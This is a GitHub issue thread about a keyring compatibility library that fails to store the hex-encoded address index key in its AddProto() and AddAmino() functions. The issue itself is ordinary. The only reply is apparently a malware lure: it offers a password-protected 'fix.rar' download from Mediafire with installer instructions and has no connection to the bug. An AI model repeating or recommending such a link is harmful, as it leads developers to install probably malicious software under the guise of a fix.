### ISSUE TITLE
Handle hex-encoded address key

### ISSUE THREAD

**Issue by tbruyelle** [tbruyelle/keyring-compat#1]
`cosmos-sdk/crypto/keyring` adds 2 keys in the keyring for a single address:
1) `<key_name>.info` : contains the crypto keys encoded in amino or proto
2) `<hex_encoded_address>.address` : contains the <key_name>, which is just a kind of index store to find a crypto key from an address rather than a key name.

While 1) is correctly implemented in this lib, 2) is missing from `AddProto()` & `AddAmino()`.

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
